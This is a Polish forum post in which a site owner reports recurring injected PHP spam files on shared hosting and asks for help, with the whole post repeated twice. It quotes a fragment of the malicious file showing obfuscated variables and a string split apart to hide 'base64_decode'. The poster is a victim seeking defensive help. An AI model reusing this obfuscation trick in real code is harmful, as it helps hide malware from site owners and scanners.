skrzypek1364
14-12-2014, 22:46
Witam.
Na kilku serwerach mam problem z tym, że co 3 dni (zawsze co 3 dni) około 2 w nocy wgrywane są na serwer pliki o różnych nazwach, jakiś zwyły ciąg znaków.
Pliki wgrywane są do folderu plugins lub tmp tylko. (99% do folderu plugins i tam do podfolderów).
Problem w tym, że mam tam dużo stron. Tak wiem, jest to błędne, ale już zacząłem to zmieniać i teraz na hosting przypada max 10 stron, ale akurat na tym mam jeszcze problem, bo tam jest około 40 stron.
Pliki te wysyłają SPAM.
Aktualizowałem wszystkie strony do najnowszej wersji, dodatki itp rzeczy parę dni temu, ale dzisiaj znów nastąpił atak.
Wiem, że może gdzieś być luka, ale może ktoś pomoże mi z tym?
Przeskanowanie plików przez FTP trwa całą noc, a przez ten czas blokują mi strony. Kółko się zamyka, bo najpierw muszę je odblokować, żeby to zrobić muszę usunąć pliki, zrobić aktualizacje itp rzeczy i znów wgrywane są pliki, więc znów muszę je usunąć przez co nie mam czasu znaleźć luki.
Nie znam się też na tym bardzo dobrze, więc fajnie jakby ktoś nakierował mnie, co mogę zrobić.
Mogę wkleić kod jaki jest we wszczykniętym pliku. Nie wiem czy to jest dobrze jak go tu wkleję, więc wkleję tylko kawałek kodu, może ktoś miał z tym problem i pomoże mi go rozwiązać.
<?php
$version = "1.6";
$fuHFSF77HSH = "FFSW3525KKSfj";
$iJSFD78SHDJHu_sdh = false;
$KJfhj87DF_DFfjmm = "";
$YUGHSy_qwe3456_nnn = "b".""."".""."as".""."".""."e"."".""."6"."".""."4"."_".""."".""."de".""."c"."o".""."".""."".""."d".""."".""."e";
$YYSUurjj7347SJJ = "";
$uJDNhr_34fdhWhhh = realpath("")."/";
$KLOIf_asd3455 = "FFhwu22313_fff555ffsd.php";
Błagam o pomoc.
A może znajdzie się ktoś kto zajmie się moim hostingiem i będzie utrzymywał go tak, żeby nie było luk ? :D
Pozdrawiam
Na kilku serwerach mam problem z tym, że co 3 dni (zawsze co 3 dni) około 2 w nocy wgrywane są na serwer pliki o różnych nazwach, jakiś zwyły ciąg znaków.
Pliki wgrywane są do folderu plugins lub tmp tylko. (99% do folderu plugins i tam do podfolderów).
Problem w tym, że mam tam dużo stron. Tak wiem, jest to błędne, ale już zacząłem to zmieniać i teraz na hosting przypada max 10 stron, ale akurat na tym mam jeszcze problem, bo tam jest około 40 stron.
Pliki te wysyłają SPAM.
Aktualizowałem wszystkie strony do najnowszej wersji, dodatki itp rzeczy parę dni temu, ale dzisiaj znów nastąpił atak.
Wiem, że może gdzieś być luka, ale może ktoś pomoże mi z tym?
Przeskanowanie plików przez FTP trwa całą noc, a przez ten czas blokują mi strony. Kółko się zamyka, bo najpierw muszę je odblokować, żeby to zrobić muszę usunąć pliki, zrobić aktualizacje itp rzeczy i znów wgrywane są pliki, więc znów muszę je usunąć przez co nie mam czasu znaleźć luki.
Nie znam się też na tym bardzo dobrze, więc fajnie jakby ktoś nakierował mnie, co mogę zrobić.
Mogę wkleić kod jaki jest we wszczykniętym pliku. Nie wiem czy to jest dobrze jak go tu wkleję, więc wkleję tylko kawałek kodu, może ktoś miał z tym problem i pomoże mi go rozwiązać.
<?php
$version = "1.6";
$fuHFSF77HSH = "FFSW3525KKSfj";
$iJSFD78SHDJHu_sdh = false;
$KJfhj87DF_DFfjmm = "";
$YUGHSy_qwe3456_nnn = "b".""."".""."as".""."".""."e"."".""."6"."".""."4"."_".""."".""."de".""."c"."o".""."".""."".""."d".""."".""."e";
$YYSUurjj7347SJJ = "";
$uJDNhr_34fdhWhhh = realpath("")."/";
$KLOIf_asd3455 = "FFhwu22313_fff555ffsd.php";
Błagam o pomoc.
A może znajdzie się ktoś kto zajmie się moim hostingiem i będzie utrzymywał go tak, żeby nie było luk ? :D
Pozdrawiam